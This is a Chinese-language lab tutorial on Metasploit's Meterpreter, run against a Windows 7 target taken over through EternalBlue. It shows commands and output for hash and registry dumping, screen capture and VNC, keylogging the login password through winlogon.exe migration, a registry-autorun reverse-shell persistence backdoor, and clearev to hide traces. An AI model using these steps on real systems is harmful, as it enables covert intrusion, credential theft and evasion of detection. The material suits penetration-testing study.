Meterpreter

Meterpreter介紹

Meterpreter是Metasploit框架中的一個(gè)擴(kuò)展模塊，作為溢出成功以后的攻擊載荷使用，攻擊載荷在溢出攻擊成功以后給我們返回一個(gè)控制通道。

使用它作為攻擊載荷能夠獲得目標(biāo)系統(tǒng)的一個(gè)Meterpreter shell的鏈接。Meterpreter shell作為滲透模塊有很多有用的功能，比如添加一個(gè)用戶、隱藏一些東西、打開shell、得到用戶 密碼、上傳下載遠(yuǎn)程主機(jī)的文件、運(yùn)行cmd.exe、捕捉屏幕、得到遠(yuǎn)程控制權(quán)、捕捉按鍵信息、清楚應(yīng)用程序、顯示、遠(yuǎn)程主機(jī)的系統(tǒng)信息、顯示遠(yuǎn)程機(jī)器的網(wǎng)絡(luò)接口和IP地址等信息。

Meterpreter常用命令

background：返回，把meterpreter后臺(tái)掛起

sessions：查看當(dāng)前建立的會(huì)話

ps：查看進(jìn)程

getpid：查看當(dāng)前進(jìn)程號(hào)

sysinfo：查看系統(tǒng)信息

getsystem：自動(dòng)提權(quán)

getuid：查看當(dāng)前權(quán)限

run scraper：獲取目標(biāo)主機(jī)的詳細(xì)信息

cat、cd、rm、edit：訪問(wèn)文件系統(tǒng)

run post/windows/gather/enum_applications：先查看目標(biāo)主機(jī)安裝了哪些應(yīng)用

screenshot：屏幕截圖

keyscan_start、keyscan_dump、keyscan_stop：鍵盤記錄

run vnc：屏幕監(jiān)控

本處我們采用之前的永恒之藍(lán)漏洞進(jìn)行展示

先按照上面的流程將永恒之藍(lán)復(fù)現(xiàn)獲取shell

meterpreter > background 

[*] Backgrounding session 1...

同exploit -j的效果一樣，都是后臺(tái)掛起會(huì)話

我們使用sessions查看

msf6 exploit(windows/smb/ms17_010_eternalblue) > sessions -l

Active sessions
===============Id  Name  Type      Informat  Connectiion       on--  ----  ----      --------  --------1         meterpre  NT AUTHO  192.168.ter x64/  RITY\SYS  11.129:4windows   TEM @ WI  444 -> 1N-B288VI  92.168.16HEBH     1.135:49159 (192.168.11.135)

使用

msf6 exploit(windows/smb/ms17_010_eternalblue) > sessions -i 1

[*] Starting interaction with 1...meterpreter > 

重新連接

查看進(jìn)程

meterpreter > ps

Process List
============PID   PPID  Name             Arch  Session  User                       Path---   ----  ----             ----  -------  ----                       ----0     0     [System Process]4     0     System           x64   0224   4     smss.exe         x64   0        NT AUTHORITY\SYSTEM        \SystemRoot\System32\smss.exe292   284   csrss.exe        x64   0        NT AUTHORITY\SYSTEM        C:\Windows\system32\csrss.exe328   284   wininit.exe      x64   0        NT AUTHORITY\SYSTEM        C:\Windows\system32\wininit.exe340   320   csrss.exe        x64   1        NT AUTHORITY\SYSTEM        C:\Windows\system32\csrss.exe380   320   winlogon.exe     x64   1        NT AUTHORITY\SYSTEM        C:\Windows\system32\winlogon.exe424   328   services.exe     x64   0        NT AUTHORITY\SYSTEM        C:\Windows\system32\services.exe432   328   lsass.exe        x64   0        NT AUTHORITY\SYSTEM        C:\Windows\system32\lsass.exe440   328   lsm.exe          x64   0        NT AUTHORITY\SYSTEM        C:\Windows\system32\lsm.exe544   424   svchost.exe      x64   0        NT AUTHORITY\SYSTEM612   424   svchost.exe      x64   0        NT AUTHORITY\NETWORK SERVICE664   424   svchost.exe      x64   0        NT AUTHORITY\LOCAL SERVICE724   424   spoolsv.exe      x64   0        NT AUTHORITY\SYSTEM        C:\Windows\System32\spoolsv.exe776   424   svchost.exe      x64   0        NT AUTHORITY\SYSTEM828   424   svchost.exe      x64   0        NT AUTHORITY\SYSTEM896   424   sppsvc.exe       x64   0        NT AUTHORITY\NETWORK SERVICE940   424   svchost.exe      x64   0        NT AUTHORITY\LOCAL SERVICE1000  424   svchost.exe      x64   0        NT AUTHORITY\LOCAL SERVICE1012  424   svchost.exe      x64   0        NT AUTHORITY\NETWORK SERVICE1196  424   taskhost.exe     x64   1        WIN-B288VI6HEBH\admin      C:\Windows\system32\taskhost.exe1296  424   SearchIndexer.e  x64   0        NT AUTHORITY\SYSTEMxe1376  776   dwm.exe          x64   1        WIN-B288VI6HEBH\admin      C:\Windows\system32\Dwm.exe1392  1340  explorer.exe     x64   1        WIN-B288VI6HEBH\admin      C:\Windows\Explorer.EXE1572  424   svchost.exe      x64   0        NT AUTHORITY\LOCAL SERVICE1664  424   svchost.exe      x64   0        NT AUTHORITY\NETWORK SERVICE1808  424   svchost.exe      x64   0        NT AUTHORITY\LOCAL SERVICE2000  544   WmiPrvSE.exe     x64   0        NT AUTHORITY\SYSTEM        C:\Windows\system32\wbem\wmiprvse.exe2032  424   svchost.exe      x64   0        NT AUTHORITY\SYSTEM

查看當(dāng)前的進(jìn)程號(hào)

meterpreter > getpid

Current pid: 724

查看系統(tǒng)信息

meterpreter > sysinfo

Computer        : WIN-B288VI6HEBH                                                                  
OS              : Windows 7 (6.1 Build 7601, Service Pack 1).                                      
Architecture    : x64                                                                              
System Language : zh_CN
Domain          : WORKGROUP
Logged On Users : 2
Meterpreter     : x64/windows

自動(dòng)提權(quán)

meterpreter > getsystem

[-] Already running as SYSTEM

由于當(dāng)前我們已經(jīng)是最高權(quán)限，所以會(huì)失敗

查看當(dāng)前權(quán)限

meterpreter > getuid

Server username: NT AUTHORITY\SYSTEM

獲取系統(tǒng)詳細(xì)信息

meterpreter > run scraper

[*] New session on 192.168.11.135:445...
[*] Gathering basic system information...
[*] Dumping password hashes...
[*] Obtaining the entire registry...
[*]  Exporting HKCU
[*]  Downloading HKCU (C:\Windows\TEMP\lFQyvFTG.reg)
[*]  Cleaning HKCU
[*]  Exporting HKLM
[*]  Downloading HKLM (C:\Windows\TEMP\ItWcfBzd.reg)
[*] Exception: Rex::TimeoutError Send timed out ["/usr/share/metasploit-framework/lib/rex/post/meterpreter/packet_dispatcher.rb:181:in `send_request'", "/usr/share/metasploit-framework/lib/rex/post/meterpreter/channel.rb:199:in `_read'", "/usr/share/metasploit-framework/lib/rex/post/meterpreter/channel.rb:176:in `read'", "/usr/share/metasploit-framework/lib/rex/post/meterpreter/channels/pool.rb:77:in `read'", "/usr/share/metasploit-framework/lib/rex/post/meterpreter/extensions/stdapi/fs/io.rb:25:in `sysread'", "/usr/share/metasploit-framework/lib/rex/post/meterpreter/extensions/stdapi/fs/file.rb:465:in `download_file'", "(eval):160:in `block in run'", "(eval):153:in `each'", "(eval):153:in `run'", "/usr/share/metasploit-framework/lib/rex/script/base.rb:44:in `eval'", "/usr/share/metasploit-framework/lib/rex/script/base.rb:44:in `run'", "/usr/share/metasploit-framework/lib/msf/base/sessions/meterpreter.rb:318:in `execute_file'", "/usr/share/metasploit-framework/lib/msf/base/sessions/scriptable.rb:183:in `execute_script'", "/usr/share/metasploit-framework/lib/rex/post/meterpreter/ui/console/command_dispatcher/core.rb:1502:in `cmd_run'", "/usr/share/metasploit-framework/lib/rex/ui/text/dispatcher_shell.rb:581:in `run_command'", "/usr/share/metasploit-framework/lib/rex/post/meterpreter/ui/console.rb:102:in `run_command'", "/usr/share/metasploit-framework/lib/rex/ui/text/dispatcher_shell.rb:530:in `block in run_single'", "/usr/share/metasploit-framework/lib/rex/ui/text/dispatcher_shell.rb:524:in `each'", "/usr/share/metasploit-framework/lib/rex/ui/text/dispatcher_shell.rb:524:in `run_single'", "/usr/share/metasploit-framework/lib/rex/post/meterpreter/ui/console.rb:64:in `block in interact'", "/usr/share/metasploit-framework/lib/rex/ui/text/shell.rb:163:in `run'", "/usr/share/metasploit-framework/lib/rex/post/meterpreter/ui/console.rb:62:in `interact'", "/usr/share/metasploit-framework/lib/msf/base/sessions/meterpreter.rb:565:in `_interact'", "/usr/share/metasploit-framework/lib/rex/ui/interactive.rb:53:in `interact'", "/usr/share/metasploit-framework/lib/msf/ui/console/command_dispatcher/core.rb:1682:in `cmd_sessions'", "/usr/share/metasploit-framework/lib/rex/ui/text/dispatcher_shell.rb:581:in `run_command'", "/usr/share/metasploit-framework/lib/rex/ui/text/dispatcher_shell.rb:530:in `block in run_single'", "/usr/share/metasploit-framework/lib/rex/ui/text/dispatcher_shell.rb:524:in `each'", "/usr/share/metasploit-framework/lib/rex/ui/text/dispatcher_shell.rb:524:in `run_single'", "/usr/share/metasploit-framework/lib/rex/ui/text/shell.rb:168:in `run'", "/usr/share/metasploit-framework/lib/metasploit/framework/command/console.rb:48:in `start'", "/usr/share/metasploit-framework/lib/metasploit/framework/command/base.rb:82:in `start'", "/usr/bin/msfconsole:23:in `<main>'"]

獲取到的信息全部保存在

ls ~/.msf4/logs/scripts/scraper/192.168.11.135_20230831.422531219

env.txt    hashes.txt  HKLM.reg        nethood.txt  services.txt  systeminfo.txt  users.txt
group.txt  HKCU.reg    localgroup.txt  network.txt  shares.txt    system.txt

查看目標(biāo)機(jī)器安裝了哪些應(yīng)用

meterpreter > run post/windows/gather/enum_applications

[*] Enumerating applications installed on WIN-B288VI6HEBH                Installed Applications                                                   
======================                                                   Name  Version                                                           ----  -------                                                           [+] Results stored in: /root/.msf4/loot/20230831034956_default_192.168.1107.txt

可以看到?jīng)]有任何應(yīng)用，因?yàn)槲倚麻_的靶機(jī)沒(méi)有進(jìn)行安裝，所以掃不到應(yīng)用，同時(shí)它也會(huì)將掃描到的結(jié)果保存在一個(gè)文件中

屏幕截圖

截取當(dāng)前屏幕的截圖

meterpreter > screenshot

Screenshot saved to: /usr/share/metasploit-framework/AoUvtimi.jpeg

同時(shí)他也會(huì)將文件保留，我們?cè)L問(wèn)一下這個(gè)文件

可以看到確實(shí)進(jìn)行了屏幕截圖并保存

屏幕監(jiān)控

meterpreter > run vnc

[*] Creating a VNC reverse tcp stager: LHOST=192.168.11.129 LPORT=4545
[*] Running payload handler
[*] VNC stager executable 73802 bytes long
[*] Uploaded the VNC agent to C:\Windows\TEMP\FlqqRKTAwzAk.exe (must be deleted manually)
[*] Executing the VNC agent with endpoint 192.168.11.129:4545...
meterpreter > Connected to RFB server, using protocol version 3.8
Enabling TightVNC protocol extensions
No authentication needed
Authentication successful
Desktop name "win-b288vi6hebh"
VNC server default format:32 bits per pixel.Least significant byte first in each pixel.True colour: max red 255 green 255 blue 255, shift red 16 green 8 blue 0
Using default colormap which is TrueColor.  Pixel format:32 bits per pixel.Least significant byte first in each pixel.True colour: max red 255 green 255 blue 255, shift red 16 green 8 blue 0
Same machine: preferring raw encoding

執(zhí)行成功之后會(huì)彈出窗口進(jìn)行實(shí)時(shí)的屏幕監(jiān)控

結(jié)果如下

進(jìn)程遷移

使用getpid查看當(dāng)前的進(jìn)程

并將進(jìn)程切換到winlogon.exe的進(jìn)程

380   320   winlogon.exe

meterpreter > migrate 380

[*] Migration completed successfully.

成功切換

鍵盤記錄

鍵盤記錄必須綁定進(jìn)程，才能獲取鍵盤輸入

先綁定完才能進(jìn)行鍵盤監(jiān)聽的進(jìn)程

我們此處綁定winlogon.exe的進(jìn)程，因?yàn)樗堑卿浵嚓P(guān)的進(jìn)程

我們可以藉此獲取登錄密碼

首先綁定winlogon.exe的進(jìn)程

1460  1712  winlogon.exe

可以看到進(jìn)程為1460

綁定

meterpreter > migrate 1460
[*] Migrating from 2992 to 1460...
[*] Migration completed successfully.

開始鍵盤監(jiān)聽

我們先將win7鎖定，回到登錄頁(yè)面

然后輸入密碼admin

這時(shí)候我們返回kali，輸出鍵盤監(jiān)聽的結(jié)果

meterpreter > keyscan_dump

Dumping captured keystrokes...
admin<CR>

成功監(jiān)聽到密碼

PS：keyscan_stop是停止鍵盤監(jiān)聽

生成持續(xù)性后門

因?yàn)?Meterpreter 是基于內(nèi)存DLL建立的連接，所以，只要目標(biāo)主機(jī)關(guān)機(jī)，我們的連接就會(huì)斷?？偛豢赡芪覀兠看蜗脒B接的時(shí)候，每次都去攻擊，然后再利用 Meterpreter 建立連接。所以，我們得在目標(biāo)主機(jī)系統(tǒng)內(nèi)留下一個(gè)持續(xù)性的后門，只要目標(biāo)主機(jī)開機(jī)了，我們就可以連接到該主機(jī)。

通過(guò)注冊(cè)表的方式，創(chuàng)建持續(xù)性后門，從而達(dá)到目標(biāo)主機(jī)一開機(jī)我們就可以對(duì)其進(jìn)行連接。

本處我們依舊使用永恒之藍(lán)漏洞作為樣例進(jìn)行解析

選擇到永恒之藍(lán)的漏洞exploit，連接到shell

然后輸入bg將會(huì)話進(jìn)行掛起，待會(huì)進(jìn)行連接

meterpreter > bg

[*] Backgrounding session 2...

msf6 exploit(windows/smb/ms17_010_eternalblue) > 

現(xiàn)在我們可以看到session編號(hào)是2，待會(huì)我們會(huì)使用這個(gè)session

然后我們不要使用它默認(rèn)的payload

將payload進(jìn)行更換

查看所有的payload

msf6 exploit(windows/smb/ms17_010_eternalblue) > show payloads 

更換payload

msf6 exploit(windows/smb/ms17_010_eternalblue) > use exploit/windows/local/persistence

查看需要添加的參數(shù)

msf6 exploit(windows/local/persistence) > show options

Module options (exploit/windows/local/persistence):                                                            Name      Current Setting  Required  Description                                                            ----      ---------------  --------  -----------DELAY     10               yes       Delay (in seconds) for persistent payload to keep reconnecting back.EXE_NAME                   no        The filename for the payload to be used on the target host (%RAND%.exe by default).PATH                       no        Path to write payload (%TEMP% by default).REG_NAME                   no        The name to call registry value for persistence on target host (%RAND% by default).SESSION                    yes       The session to run this module onSTARTUP   USER             yes       Startup type for the persistent payload. (Accepted: USER, SYSTEM)VBS_NAME                   no        The filename to use for the VBS persistent script on the target host(%RAND% by default).Payload options (windows/meterpreter/reverse_tcp):Name      Current Setting  Required  Description----      ---------------  --------  -----------EXITFUNC  process          yes       Exit technique (Accepted: '', seh, thread, process, none)LHOST     192.168.11.129   yes       The listen address (an interface may be specified)LPORT     4444             yes       The listen port**DisablePayloadHandler: True   (no handler will be created!)**Exploit target:Id  Name--  ----0   Windows

對(duì)應(yīng)是yes的參數(shù)就是必填參數(shù)

DELAY、SESSION、STARTUP、EXITFUNC、LHOST、LPORT

已經(jīng)填入?yún)?shù)的的部分我們及基本不用進(jìn)行修改，除了STARTUP對(duì)應(yīng)的USER權(quán)限過(guò)低，我們要將其改成SYSTEM提高權(quán)限。

先進(jìn)行設(shè)置session

msf6 exploit(windows/local/persistence) > set SESSION 2

SESSION => 2

然后我們更改USER為SYSTEM

msf6 exploit(windows/local/persistence) > set STARTUP SYSTEM

STARTUP => SYSTEM

接下來(lái)就可以直接運(yùn)行

將這個(gè)服務(wù)寫入靶機(jī)的注冊(cè)表里面

msf6 exploit(windows/local/persistence) > run

[*] Running persistent module against WIN-B288VI6HEBH via session ID: 2
[+] Persistent VBS script written on WIN-B288VI6HEBH to C:\Windows\TEMP\EMjGouItv.vbs
[*] Installing as HKLM\Software\Microsoft\Windows\CurrentVersion\Run\ShwaKYPpokUR
[+] Installed autorun on WIN-B288VI6HEBH as HKLM\Software\Microsoft\Windows\CurrentVersion\Run\ShwaKYPpokUR
[*] Clean up Meterpreter RC file: /root/.msf4/logs/persistence/WIN-B288VI6HEBH_20230901.0315/WIN-B288VI6HEBH_20230901.0315.rc

接下來(lái)我們只需要進(jìn)行監(jiān)聽就可以了

msf6 exploit(windows/local/persistence) > back

選擇監(jiān)聽模塊

msf6 > use exploit/multi/handler

設(shè)置payload

msf6 exploit(multi/handler) > set payload windows/meterpreter/reverse_tcp

查看缺失的必選參數(shù)

msf6 exploit(multi/handler) > show missing

Module options (exploit/multi/handler):Name  Current Setting  Required  Description----  ---------------  --------  -----------Payload options (windows/meterpreter/reverse_tcp):Name   Current Set  Required  Descriptionting----   -----------  --------  -----------LHOST               yes       The listen address (an interfacemay be specified)

可以看到這里缺失的是LHOST，所以這邊我們要填寫本機(jī)的IP地址

msf6 exploit(multi/handler) > set LHOST 192.168.11.129

檢查一下Windows靶機(jī)中注冊(cè)表有沒(méi)有寫入

可以看到已經(jīng)成功寫入

然后直接運(yùn)行，開始監(jiān)聽(到這邊已經(jīng)正式脫離了永恒之藍(lán)漏洞了)

msf6 exploit(multi/handler) > run

清除事件日志

Windows系統(tǒng)會(huì)自動(dòng)將所有的登錄信息記錄到登錄日志當(dāng)中去

在這邊，我們可以看到許多特殊登錄的信息，這就是我們通過(guò)后門進(jìn)行登錄的信息，我們得清除這些信息，才能讓使用者不會(huì)發(fā)現(xiàn)我們。

清除事件日志命令

meterpreter > clearev